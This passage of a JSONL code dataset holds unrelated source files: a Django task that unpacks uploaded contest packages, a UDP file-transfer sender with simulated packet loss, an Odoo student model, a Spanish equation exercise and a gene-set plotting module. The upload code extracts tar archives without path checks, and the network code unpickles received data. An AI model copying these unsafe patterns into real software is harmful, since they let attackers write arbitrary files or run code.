IntermidiateTask(user_id, contest_task_package_path, contest_id):\n try:\n user = get_user_model().objects.get(pk=user_id)\n upload = models.ContestTaskPackageUpload(author=user, path=contest_task_package_path)\n upload.save()\n\n UploadContestTaskPackageCelery(contest_task_package_path, contest_id, upload.id)\n upload.result = 2\n except Exception as e:\n print('[ERROR] Loading Task Pacakge', e, '[END_ERROR]')\n upload.result = 1\n upload.save()\n\ndef UploadContestTaskPackageCelery(contest_task_package_path, contest_id, contest_task_upload_id):\n contest = models.Contest.objects.get(pk=contest_id)\n contest_path = os.path.join(settings.CONTESTS_DIR, str(contest.special_id))\n\n upload = models.ContestTaskPackageUpload.objects.get(pk=contest_task_upload_id)\n \n # DO THINGS\n contest_task_path = UnpackContestTestPackage(contest_task_package_path, contest_path)\n\n task = GenerateContestTaskFromPath(contest_task_path, contest, upload)\n GenerateContestTasksTestsFromContestTask(task)\n # DONE THINGS\n\n upload.result = 2\n\ndef GenerateContestTasksTestsFromContestTask(contest_task):\n # TODO\n # DO IT BETETER\n task_tests = [os.path.join(contest_task.path, x) for x in os.listdir(contest_task.path) if os.path.isdir(os.path.join(contest_task.path, x))]\n for task_dir in task_tests:\n ord_id = int(os.path.basename(task_dir)[4:])\n task_test = models.ContestTaskTest(task=contest_task, path=task_dir, ord_id=ord_id)\n task_test.save()\n\ndef GenerateContestTaskFromPath(contest_task_path, contest, upload):\n # Body\n body_path = os.path.join(contest_task_path, 'body.html')\n with open(body_path, 'r+', encoding='utf-8') as f:\n body = f.read()\n \n # Config\n config_path = os.path.join(contest_task_path, 'config.json')\n with open(config_path, 'r+', encoding='utf-8') as f:\n config = json.loads(f.read())\n \n title = config['title']\n timelimit = config['timelimit']\n sublimit = config['sublimit']\n points = config['points']\n ord_id = config['ord_id']\n\n task = models.ContestTask(contest=contest, package=upload, ord_id=ord_id, timelimit=timelimit, sublimit=sublimit, body=body, title=title, path=contest_task_path)\n task.save()\n\n return task\n\ndef UnpackContestTestPackage(contest_task_package_path, contest_path):\n contest_task_path = os.path.splitext(os.path.splitext(contest_task_package_path)[0])[0]\n # contest_task_folder_name = os.path.basename(contest_path)\n\n tar = tarfile.open(contest_task_package_path, 'r')\n tar.extractall(contest_path)\n tar.close()\n\n return contest_task_path\n\n# def CreateTaskObjectFromPath()\n\ndef SaveContestTaskPackage(package, contest_path):\n os.makedirs(contest_path, exist_ok=True)\n\n contest_task_path = os.path.join(contest_path, package.name)\n with open(contest_task_path, 'wb+') as d:\n for chunk in package.chunks():\n d.write(chunk)\n\n return contest_task_path\n","sub_path":"SKE_CONTESTS/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":6894,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"635335841","text":"import sys\nimport socket\nimport pickle\nimport threading\nimport random\nimport time\nfrom threading import Timer\n\nreceiver_host_ip = sys.argv[1]\nreceiver_port = int(sys.argv[2])\nfilename = sys.argv[3]\nMWS = int(sys.argv[4])\nMSS = int(sys.argv[5])\ngamma = int(sys.argv[6])\n#PLD moudle\npdrop = float(sys.argv[7])\npduplicate = float(sys.argv[8])\npcorrupt = float(sys.argv[9])\nporder = float(sys.argv[10])\nmaxorder = int(sys.argv[11])\npdelay = float(sys.argv[12])\nmaxdelay = int(sys.argv[13])\nPLD_seed = int(sys.argv[14])\n\nfor i in range(1,15):\n print(sys.argv[i])\n# filename = 'test0.pdf'\n# MSS = 150\n# MWS = 600\n# pdrop = 0.2\n# pduplicate = 0.2\n# pcorrupt = 0.2\n# porder=0.2\n# maxorder=3\n# pdelay=0.2\n# maxdelay=50\npk_status = \"ok\"\nrandom.seed(PLD_seed)\n\nclass STP_Segment: # Header and data\n def __init__(self, SYN=0, ACK=0, FIN=0, seq=0, ack=0, mss=0, data=\"\", status=\"\", time1=0,\\\n delay_clock=0, s_time=0, length=0):\\\n self.SYN, self.ACK, self.FIN, self.seq, self.ack, self.mss, self.data, self.status, self.time1, self.delay_clock,\\\n self.s_time, self.length = SYN, ACK, FIN, seq, ack, mss, data, status, time1, delay_clock, s_time, length\n\nskt = socket.socket(socket.AF_INET,\n socket.SOCK_DGRAM)\n\naddress = (receiver_host_ip, receiver_port)\n\nlog_file = open(\"Sender_log.txt\", \"w\")\n\nlock = threading.Semaphore()\n\ndef handshake(): # set a sequence number for sender\n seq = 0\n handshake1 = STP_Segment(SYN=1)\n handshake1 = pickle.dumps(handshake1)\n skt.sendto(handshake1, address)\n handshake1 = pickle.loads(handshake1)\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake1.seq, len(handshake1.data), 0))\n seg, addr = skt.recvfrom(1024)\n seg = pickle.loads(seg)\n log_file.writelines(\"rcv {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, seg.seq, len(seg.data), seg.ack))\n if seg.SYN == 1 and seg.ACK == 1:\n new_seq = seq + 1\n new_ack = seg.seq + 1\n handshake3 = STP_Segment(ACK=1, seq=new_seq, ack=new_ack)\n handshake3 = pickle.dumps(handshake3)\n skt.sendto(handshake3, addr)\n handshake3 = pickle.loads(handshake3)\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake3.seq, len(handshake3.data), handshake3.ack))\n print(\"Connecting success!\")\n else:\n skt.close()\n print(\"Connecting fail.\")\n\nbegin_time = time.time()\nhandshake()\n\ndata_list = {} # all the data are chopped well in this hash\n\n\ndef clip_data(): #chop the data\n global data_list\n global MSS\n global total_amount\n\n with open(filename, 'rb') as file_handle:\n data_set = file_handle.read()\n data_amount = len(data_set)\n for i in range(0, data_amount, MSS):\n seg_data = data_set[i: i+MSS]\n data_seg = STP_Segment(ACK=1, data=seg_data, seq=i+1)\n data_list[i+1] = data_seg\n return data_amount\n\ntotal_amount = clip_data()\n\ntotal_len = total_amount\n\nmss_value = STP_Segment(mss=MSS, length=total_len)\nmss_value = pickle.dumps(mss_value)\nskt.sendto(mss_value, address)\n\n\n\nmax_buffernum = int(MWS / MSS)\n\nlast_send = 0\ninit_flag = STP_Segment(seq=0,ack=1)\nsending_buffer = [0]\nreceiving_buffer = [1]\nreorder_list = {}\ndelay_list = []\ntotal_delay = 0\ntotal_amount = 0\n\nER = 500\nDR = 250\n#gamma = 4\ntimeout = 0\ntimeout = (ER + gamma * DR) / 1000\nskt.settimeout(timeout)\n\nnew_timeout = timeout\nsend_time = 0\nsampleRTT = 0\n\n##############\ntotal_pac = 0\ntotal_pld = 0\ntotal_drop = 0\ntotal_corr = 0\ntotal_reorder = 0\ntotal_dup = 0\ntotal_del = 0\ntotal_timeout = 0\ntotal_fr = 0\ntotal_dupack = 0\n\n\n\n\n\ndef send():\n global sending_buffer\n global receiving_buffer\n global data_list\n global address\n global MWS\n global last_send\n global pk_status\n global reorder_list\n global delay_list\n global total_delay\n global maxdelay\n global new_timeout\n global send_time\n global sampleRTT\n global ER\n global DR\n global gamma\n\n global total_pac\n global total_pld\n global total_drop\n global total_corr\n global total_reorder\n global total_dup\n global total_del\n global total_timeout\n global total_fr\n global total_dupack\n\n while True:\n pk_status = \"ok\"\n total_pac += 1\n send_time = 0\n sampleRTT = 0\n if receiving_buffer.count(receiving_buffer[-1]) > 3:\n total_fr += 1\n data_send = pickle.dumps(data_list[receiving_buffer[-1]])\n PLD(data_send)\n\n if receiving_buffer[-1] > sending_buffer[-1]:\n data_send = pickle.dumps(data_list[receiving_buffer[-1]])\n PLD(data_send)\n\n for i in data_list:\n if (i > sending_buffer[-1]) and (i < receiving_buffer[-1] + MWS):\n data_send = pickle.dumps(data_list[i])\n PLD(data_send)\n break\n\n if len(list(reorder_list.keys())) != 0 and reorder_list[list(reorder_list.keys())[0]] == maxorder:\n num1 = list(reorder_list.keys())[0]\n reorder_list.pop(num1)\n data_send = pickle.dumps(data_list[num1])\n PLD(data_send)\n data_send = pickle.loads(data_send)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n\n for ele in delay_list:\n time_now = time.time()\n if (time_now - ele.time1)/1000 >= ele.delay_clock:\n data_send = pickle.dumps(ele)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd/delay {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n delay_list.remove(ele)\n\n\n\n if pk_status != \"drop\" and pk_status != \"corr\" and pk_status != \"reorder\" \\\n and pk_status != \"rdelay\":\n try:\n data_receive, addr = skt.recvfrom(1024)\n data_receive = pickle.loads(data_receive)\n if data_receive.ack < total_len:\n log_file.writelines(\"rcv {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_receive.ACK, len(data_receive.data), data_receive.ack))\n if data_receive.ack in receiving_buffer:\n total_dupack += 1\n receiving_buffer.append(data_receive.ack)\n if data_receive.s_time != 0:\n sampleRTT = (time.time() - data_receive.s_time) / 1000\n ER = 0.875 * ER + 0.125 * sampleRTT\n DR = 0.75 * DR + 0.25 * abs(sampleRTT-ER)\n new_timeout = (ER + gamma * DR) / 1000\n\n except socket.timeout:\n total_timeout += 1\n data_send = pickle.dumps(data_list[receiving_buffer[-1]])\n PLD(data_send)\n skt.settimeout(new_timeout)\n if receiving_buffer[-1] > total_len:\n break\n\ndef PLD(data_send):\n global sending_buffer\n global receiving_buffer\n global data_list\n global address\n global MWS\n global pk_status\n global reorder_list\n global delay_list\n global total_delay\n global maxdelay\n global new_timeout\n global send_time\n global sampleRTT\n\n global total_pac\n global total_pld\n global total_drop\n global total_corr\n global total_reorder\n global total_dup\n global total_del\n global total_timeout\n global total_fr\n global total_dupack\n\n total_pld += 1\n\n if len(list(reorder_list.keys())) != 0:\n reorder_list[list(reorder_list.keys())[0]] += 1\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pdrop:\n total_drop += 1\n pk_status = \"drop\"\n #print(\"drop\",)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"drop {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n print(\"drop\", data_send.seq)\n\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pduplicate:\n total_dup += 1\n data_send = pickle.loads(data_send)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n print(data_send.seq)\n\n data_send.status = \"dup\"\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd/dup {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n print(\"dup\", data_send.seq)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pcorrupt:\n pk_status = \"corr\"\n total_corr += 1\n data_send = pickle.loads(data_send)\n data_send.status = \"corr\"\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n log_file.writelines(\"snd/corr {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, data_send.seq, len(data_send.data), data_send.ack))\n\n print(\"corr\", data_send.seq)\n\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < porder and len(reorder_list) == 0:\n total_reorder += 1\n data_send = pickle.loads(data_send)\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n\n pk_status = \"reorder\"\n reorder_list[data_send.seq] = 0\n return\n\n ran_num = random.random()\n print(ran_num)\n if ran_num < pdelay:\n total_del += 1\n print(\"delay\")\n delay_time = random.randint(0, maxdelay)\n if delay_time + total_delay < maxdelay:\n pk_status = \"rdelay\"\n total_delay = delay_time + total_delay\n\n data_send = pickle.loads(data_send)\n\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n\n\n data_send.time1 = time.time()\n data_send.delay_clock = delay_time\n if len(delay_list) != 0:\n if delay_list[-1].seq != data_send.seq:\n delay_list.append(data_send)\n return\n\n data_send = pickle.loads(data_send)\n if data_send.seq in sending_buffer:\n log_file.writelines(\"snd/RXT {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time() - begin_time, data_send.seq, len(data_send.data), data_send.ack))\n if data_send.seq not in sending_buffer:\n sending_buffer.append(data_send.seq)\n data_send.s_time = time.time()\n data_send.status = \"good\"\n log_file.writelines(\"snd {:2.3f} D {:5d} {:3d} {:5d}\\n\"\n .format(time.time() - begin_time, data_send.seq, len(data_send.data), data_send.ack))\n\n data_send = pickle.dumps(data_send)\n skt.sendto(data_send, address)\n data_send = pickle.loads(data_send)\n print(data_send.seq)\n\n\nsend()\n\ndef shake():\n global address\n seq1 = total_len + 1\n handshake1 = STP_Segment(SYN=1, seq=seq1, ack=1)\n handshake1 = pickle.dumps(handshake1)\n skt.sendto(handshake1, address)\n handshake1 = pickle.loads(handshake1)\n log_file.writelines(\"snd {:2.3f} F {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake1.seq, len(handshake1.data), 1))\n\n seg, address = skt.recvfrom(1024)\n seg = pickle.loads(seg)\n log_file.writelines(\"rcv {:2.3f} F {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, seg.seq, len(seg.data), seg.ack))\n\n if seg.SYN == 1 and seg.ACK == 1:\n new_seq = seq1 + 1\n handshake3 = STP_Segment(ACK=1, seq=new_seq, ack=2)\n handshake3 = pickle.dumps(handshake3)\n skt.sendto(handshake3, address)\n handshake3 = pickle.loads(handshake3)\n log_file.writelines(\"snd {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n .format(time.time()-begin_time, handshake3.seq, len(handshake3.data), 2))\n\n # seg, address = skt.recvfrom(1024)\n # seg = pickle.loads(seg)\n # log_file.writelines(\"rcv {:2.3f} A {:5d} {:3d} {:5d}\\n\"\n # .format(time.time() - begin_time, seg.seq, len(seg.data), seg.ack))\n print(\"Connecting break!\")\n else:\n skt.close()\n print(\"Breaking fail.\")\n\n\nshake()\n\nlog_file.writelines(\"====================================\\n\")\nlog_file.writelines(\"Size of the file: {}\\n\".format(total_len))\nlog_file.writelines(\"Segments transmitted (including drop & RXT): {}\\n\".format(total_pac))\nlog_file.writelines(\"Number of Segments handled by PLD: {}\\n\".format(total_pld))\nlog_file.writelines(\"Number of Segments Dropped: {}\\n\".format(total_drop))\nlog_file.writelines(\"Number of Segments Corrupted: {}\\n\".format(total_corr))\nlog_file.writelines(\"Number of Segments Re-ordered: {}\\n\".format(total_reorder))\nlog_file.writelines(\"Number of Segments Duplicated: {}\\n\".format(total_dup))\nlog_file.writelines(\"Number of Segments Delayed: {}\\n\".format(total_del))\nlog_file.writelines(\"Number of Retransmissions due to timeout: {}\\n\".format(total_timeout))\nlog_file.writelines(\"Number of Fast Retransmissions: {}\\n\".format(total_fr))\nlog_file.writelines(\"Number of Duplicate Acknowledgements received:{}\\n\".format(total_dupack))\nlog_file.writelines(\"====================================\")\n","sub_path":"All projects/Modified UDP protocol/sender.py","file_name":"sender.py","file_ext":"py","file_size_in_byte":14611,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"648650254","text":"from odoo import api, fields, models\n\n\nclass Student(models.Model):\n _inherit = 'uni.student'\n\n\n def calc_total_residaul(self):\n return sum (line.sub_total - line.paid_amount for line in self.fees_ids if line.paid_amount != 0)\n \n\n year_id = fields.Many2one(\n string=\"Academic Year\",\n comodel_name=\"uni.year\",\n readonly=True,\n )\n\n certificate_type_id = fields.Many2one(\n comodel_name='uni.certificate.type',\n string='Certificate Type',\n )\n\n currency_id = fields.Many2one('res.currency' , string=\"Currency\")\n\n admission_date = fields.Date(string='Admission date')\n\n admission_rec = fields.Many2one('uni.admission', string=\"Admission Record\")\n\n category_id = fields.Many2many(\n string=\"Discount Type\",\n comodel_name=\"uni.student_category\",\n readonly=True,\n )\n\n fees_ids = fields.One2many(\n string=\"Student Fees\",\n comodel_name=\"student.fees\",\n inverse_name=\"student_id\",\n readonly=False\n )\n\n fees_payment_ids = fields.One2many(\n string=\"Fees Payments\",\n comodel_name=\"fees.payment.line\",\n inverse_name=\"student_id\",\n readonly=False\n )\n\n amount_sub_total = fields.Float(\n string='Sub Total', store=True, readonly=True, compute='_compute_amount')\n amount_total = fields.Float(\n string='Total', store=True, readonly=True, compute='_compute_amount')\n discount = fields.Float(\n string='Discount', store=True, readonly=True, compute='_compute_amount')\n # TODO: get default recivable account\n '''account_id = fields.Many2one('account.account',\n\t\t\t\t\t\t\t\t domain=lambda self: [('user_type_id.id', '=', self.env.ref(\n\t\t\t\t\t\t\t\t\t 'account.data_account_type_receivable').id)],\n\t\t\t\t\t\t\t\t help=\"Student recivable account\")\n\t'''\n guardian_national_id_img = fields.Binary(string=\"National ID Image\", )\n student_national_id_img = fields.Binary(string=\"National ID Image\", )\n\n # foot_ball = fields.Boolean(string=\"Foot Ball\", )\n # volley_ball = fields.Boolean(string=\"Volley Ball\", )\n # basket_ball = fields.Boolean(string=\"Basket Ball\", )\n # swimming = fields.Boolean(string=\"Swimming\", )\n # table_tennis = fields.Boolean(string=\"table tennis\", )\n # other_sport = fields.Char(string=\"Other\", )\n\n # memorizing_holly_quran = fields.Boolean(\n # string=\"memorizing the holly Quran\", )\n # poetry = fields.Boolean(string=\"Poetry\", )\n # stage = fields.Boolean(string=\"Stage\", )\n # singing = fields.Boolean(string=\"singing\", )\n # other_cultural = fields.Char(string=\"Other\", )\n\n \n kin_emergency = fields.Char()\n kin_ph_emergency = fields.Integer()\n\n # blood_group = fields.Selection(\n # string='Blood group',\n # selection=[\n # ('A+', 'A+'), ('A-', 'A-'), ('B+', 'B+'), ('B-', 'B-'), \n # ('O+', 'O+'), ('O-', 'O-'), ('AB+', 'AB+'), ('AB-', 'AB-')\n # ],default='B+'\n # )\n allergies_disea = fields.Char()\n chronic_dsease = fields.Char()\n other_dsease = fields.Char()\n\n type_admission = fields.Selection(\n selection=[\n ('new_admission', 'New Admission'),\n ('transfer' , 'Transer from another University'),\n ('upgrading' , 'Upgrading'),\n ('degree_holder' , 'Degree holder')\n ],default='new_admission'\n )\n\n is_previouse_admitt = fields.Selection(\n selection=[\n ('yes', 'Yes'),\n ('no', 'No'),\n ],default='no'\n )\n\n reasons = fields.Selection(\n selection=[\n ('resignation', 'Resignation'),\n ('acadimic_dismissal', 'Acadimic Dismissal'),\n ],default =''\n )\n\n other = fields.Char()\n\n sibling_in_nile = fields.Integer( )\n\n\n\n\n\n @api.one\n @api.depends('fees_ids.sub_total', 'fees_ids.discount')\n def _compute_amount(self):\n self.amount_sub_total = sum(\n line.sub_total for line in self.fees_ids)\n self.discount = sum(\n line.discount for line in self.fees_ids)\n self.amount_total = self.amount_sub_total # - self.discount\n\n\n def create_move(self):\n return {\n 'name': _('Fees Payment'),\n 'view_type': 'form',\n 'view_mode': 'form',\n 'res_model': 'post.customer.check.action',\n 'type': 'ir.actions.act_window',\n 'target':'new',\n 'context':{\n 'default_name':self.check_number,\n 'default_partner_id':self.line_id.partner_id.id,\n 'default_amount': self.amount - self.paid_amount,\n 'default_line_id':self.id,\n 'default_description':self.description,\n 'default_currency_id':self.currency_id.id,\n }\n\n }\n","sub_path":"uni_admission/models/student.py","file_name":"student.py","file_ext":"py","file_size_in_byte":4770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"185607331","text":"#funciones\r\n\r\n#crear_dep: recibe la cantidad de variables dependientes e inserta cada una en una lista\r\ndef crear_dep(lst):\r\n\tn = int(input(\"\\nVariables Dependientes\\n\\t-Cantidad de variables dependientes: \"))\r\n\tfor i in range(0 , n):\r\n\t\tvariable = str(input(\"\\t\\t-Variable {}: \".format(i+1)))\r\n\t\tlst.insert(i, variable)\r\n\r\n#crear_indep:\r\ndef crear_indep(lst):\r\n\tn = int(input(\"\\nVariables Independientes\\n\\t-Cantidad de variables independientes: \"))\r\n\tfor i in range(0 , n):\r\n\t\tvariable = str(input(\"\\t\\t-Variable {}: \".format(i+1)))\r\n\t\tlst.insert(i, variable)\r\n#imprimir_lst: imprime una lista\r\ndef imprimir_ecuacion(lst):\r\n\tecuacion = \"\"\r\n\tfor it in lst:\r\n\t\tecuacion+=it\r\n\tprint(ecuacion)\r\n\r\n\r\ndef encontrar_soluciones(solucion, ecuacion, independientes, dependientes):\r\n\ti = 0\r\n\twhile i < len(dependientes):\r\n\t\tposicion = 0\r\n\t\tj = 0\r\n\t\twhile j < len(independientes):\r\n\t\t\tfor termino in ecuacion:\r\n\t\t\t\tif termino == 'x' or termino == 'y':\r\n\t\t\t\t\tsolucion.insert(posicion, dependientes[i])\r\n\t\t\t\telif termino == 'a' or termino == 'b':\r\n\t\t\t\t\tsolucion.insert(posicion, independientes[j])\r\n\t\t\t\telse:\r\n\t\t\t\t\tsolucion.insert(posicion, termino)\r\n\t\t\t\tposicion+=1\t\r\n\t\t\timprimir_ecuacion(solucion)\r\n\t\t\tsolucion.clear()\t\r\n\t\t\tj+=1\r\n\t\ti+=1\r\n\treturn True\r\n\r\n\"\"\"............................................................\"\"\"\r\n\r\n#programa principal\r\nlst_solucion = []\r\nlst_dependientes = []\r\nlst_independientes = []\r\nlst_ecuaciones = [[\"(\", \"x\", \"-\", \"y\", \")\", \"*\", \"(\", \"a\", \"-\", \"b\", \")\"], [\"x\", \"+\", \"*\", \"a\", \"-\", \"y\"],[\"x\", \"*\", \"*\", \"2\", \"+\", \"2\", \"*\", \"*\", \"a\", \"-\", \"y\", \"*\", \"*\", \"2\"]]\r\n\r\nprint(\"\\t\\tPrograma Ecuaciones\\n\")\r\n\r\ncrear_dep(lst_dependientes)\r\ncrear_indep(lst_independientes)\r\n\r\n#imprimir_lst(lst_dependientes)\r\n#imprimir_lst(lst_independientes)\r\n\r\nfor i in range(0, 3):\r\n\tencontrar_soluciones(lst_solucion, lst_ecuaciones[i], lst_independientes, lst_dependientes)\r\n\r\n","sub_path":"curso 1/ejercicio1/ejercicio1.py","file_name":"ejercicio1.py","file_ext":"py","file_size_in_byte":1874,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"6"} +{"seq_id":"180834035","text":"import collections\nimport os\n\nimport numpy as np\nimport pandas as pd\nimport seaborn as sns\nimport statsmodels.api as sm\nfrom matplotlib import pyplot as plt, colors\nfrom scipy import stats\nfrom statsmodels.sandbox.regression.predstd import wls_prediction_std\n\nfrom plotting import venn, common\nfrom rnaseq import gsva\nfrom settings import HGIC_LOCAL_DIR, GIT_LFS_DATA_DIR, DATA_DIR\nfrom utils import setops, output, log, reference_genomes\n\nlogger = log.get_console_logger()\n\ndef line_plot_pvalues_slope(\n pvals,\n slopes,\n cmap=plt.get_cmap('Reds'),\n alpha=None,\n log_scale=True,\n vmin=None,\n vmax=None,\n):\n \"\"\"\n Plot summarising pvalue and correlation slope simultaneously using position (slope) and colour (pval).\n Hard coded into vertical orientation (TODO: make this a parameter??)\n :param pvals: DataFrame. Index and columns will be used for ticklabels. Suggest using -log10\n :param slopes: DataFrame, must match pvals\n :param pct_to_size_func:\n :param cmap: cmap used to represent\n :param alpha: If supplied, highlight all results with p < alpha.\n :param log_scale: If True (default), convert p values to -log10 scale.\n :param vmin: For pvalue shading. If not supplied, min of data will be used\n :param vmax: For pvalue shading. If not supplied, max of data will be used\n :return:\n \"\"\"\n if sorted(pvals.index) != sorted(slopes.index):\n raise AttributeError(\"Index of pvals and concords must match\")\n if sorted(pvals.columns) != sorted(slopes.columns):\n raise AttributeError(\"Columns of pvals and concords must match\")\n\n if alpha is None:\n alpha = -1.\n\n signif = pvals < alpha\n\n if log_scale:\n pvals = -np.log10(pvals.astype(float))\n\n slopes = slopes.loc[pvals.index, pvals.columns]\n\n if vmin is None:\n vmin = pvals.values.min()\n if vmax is None:\n vmax = pvals.values.max()\n\n ny, nx = pvals.shape\n markers = common.get_best_marker_map(nx)\n\n gs = plt.GridSpec(nrows=2, ncols=1, height_ratios=[1, 19])\n fig = plt.figure(figsize=(1.5 * nx, .5 * ny))\n ax = fig.add_subplot(gs[1])\n ax.invert_yaxis()\n\n cax = fig.add_subplot(gs[0])\n\n plogp_norm = colors.Normalize(vmin=vmin, vmax=vmax)\n plogp_sm = plt.cm.ScalarMappable(cmap=cmap, norm=plogp_norm)\n\n for i, col in enumerate(slopes.columns):\n ew = [1.5 if t else 0.7 for t in signif[col].values]\n ax.scatter(\n slopes[col],\n range(ny),\n c=[plogp_sm.to_rgba(t) for t in pvals[col].values],\n s=60,\n edgecolor='k',\n linewidths=ew,\n marker=markers[i]\n )\n\n ax.set_xlabel('Slope', fontsize=12)\n ax.set_yticks(range(ny))\n ax.set_yticklabels(pvals.index, fontsize=12)\n # ax.set_xlim([50, 100])\n plogp_sm.set_array(pvals)\n fig.colorbar(plogp_sm, cax=cax, orientation='horizontal')\n cax.xaxis.set_label_position('top')\n cax.set_xlabel(r'$-\\log_{10}(p)$')\n\n type_attrs = {\n 'class': 'line',\n 'linestyle': 'none',\n 'markeredgecolor': 'k',\n 'markeredgewidth': 1.,\n 'markerfacecolor': 'none',\n 'markersize': 8\n }\n\n leg_dict = {}\n for i, col in enumerate(pvals.columns):\n leg_dict[col] = dict(type_attrs)\n leg_dict[col].update({'marker': markers[i]})\n\n common.add_custom_legend(ax, leg_dict, loc_outside=True, loc_outside_horiz='right')\n gs.update(left=0.2, bottom=0.1, right=0.72, top=0.95, hspace=0.12)\n\n return {\n 'fig': fig,\n 'ax': ax,\n 'gs': gs,\n 'cax': cax\n }\n\n\nkegg_mtor_from_msigdb = [\n \"AKT3\", \"EIF4B\", \"EIF4E\", \"EIF4EBP1\", \"AKT1\", \"AKT2\", \"FIGF\", \"PIK3R5\", \"MTOR\", \"RICTOR\", \"EIF4E1B\", \"ULK3\",\n \"RPS6KA6\", \"HIF1A\", \"IGF1\", \"INS\", \"PDPK1\", \"CAB39\", \"PGF\", \"PIK3CA\", \"PIK3CB\", \"PIK3CD\", \"PIK3CG\", \"PIK3R1\",\n \"PIK3R2\", \"DDIT4\", \"PRKAA1\", \"PRKAA2\", \"MAPK1\", \"MAPK3\", \"RPTOR\", \"RHEB\", \"RPS6\", \"RPS6KA1\", \"RPS6KA2\",\n \"RPS6KA3\", \"RPS6KB1\", \"RPS6KB2\", \"MLST8\", \"BRAF\", \"STK11\", \"TSC1\", \"TSC2\", \"VEGFA\", \"VEGFB\", \"VEGFC\", \"CAB39L\",\n \"ULK1\", \"PIK3R3\", \"STRADA\", \"EIF4E2\", \"ULK2\"\n]\n\n# downloaded directly from KEGG website (hsa04150)\nkegg_mtor_from_kegg = [\n \"SLC7A5\", \"SLC3A2\", \"SLC38A9\", \"ATP6V1A\", \"ATP6V1B1\", \"ATP6V1B2\", \"ATP6V1C2\", \"ATP6V1C1\", \"ATP6V1D\", \"ATP6V1E2\",\n \"ATP6V1E1\", \"ATP6V1F\", \"ATP6V1G1\", \"ATP6V1G3\", \"ATP6V1G2\", \"ATP6V1H\", \"LAMTOR1\", \"LAMTOR2\", \"LAMTOR3\",\n \"LAMTOR4\", \"LAMTOR5\", \"FLCN\", \"FNIP1\", \"FNIP2\", \"RRAGA\", \"RRAGB\", \"RRAGC\", \"RRAGD\", \"SESN2\", \"CASTOR1\",\n \"CASTOR2\", \"MIOS\", \"SEH1L\", \"WDR24\", \"WDR59\", \"SEC13\", \"DEPDC5\", \"NPRL2\", \"NPRL3\", \"SKP2\", \"RNF152\", \"RPTOR\",\n \"AKT1S1\", \"MTOR\", \"DEPTOR\", \"MLST8\", \"TELO2\", \"TTI1\", \"CLIP1\", \"GRB10\", \"ULK1\", \"ULK2\", \"EIF4EBP1\", \"EIF4E\",\n \"EIF4E2\", \"EIF4E1B\", \"RPS6KB1\", \"RPS6KB2\", \"EIF4B\", \"RPS6\", \"STRADA\", \"STRADB\", \"STK11\", \"CAB39\", \"CAB39L\",\n \"PRKAA1\", \"PRKAA2\", \"TSC1\", \"TSC2\", \"TBC1D7\", \"TBC1D7\", \"RHEB\", \"DDIT4\", \"WNT1\", \"WNT2\", \"WNT2B\", \"WNT3\",\n \"WNT3A\", \"WNT4\", \"WNT5A\", \"WNT5B\", \"WNT6\", \"WNT7A\", \"WNT7B\", \"WNT8A\", \"WNT8B\", \"WNT9A\", \"WNT9B\", \"WNT10B\",\n \"WNT10A\", \"WNT11\", \"WNT16\", \"FZD1\", \"FZD7\", \"FZD2\", \"FZD3\", \"FZD4\", \"FZD5\", \"FZD8\", \"FZD6\", \"FZD10\", \"FZD9\",\n \"LRP5\", \"LRP6\", \"DVL3\", \"DVL2\", \"DVL1\", \"GSK3B\", \"TNF\", \"TNFRSF1A\", \"IKBKB\", \"INS\", \"IGF1\", \"INSR\", \"IGF1R\",\n \"GRB2\", \"SOS1\", \"SOS2\", \"HRAS\", \"KRAS\", \"NRAS\", \"BRAF\", \"RAF1\", \"MAP2K1\", \"MAP2K2\", \"MAPK1\", \"MAPK3\", \"RPS6KA3\",\n \"RPS6KA1\", 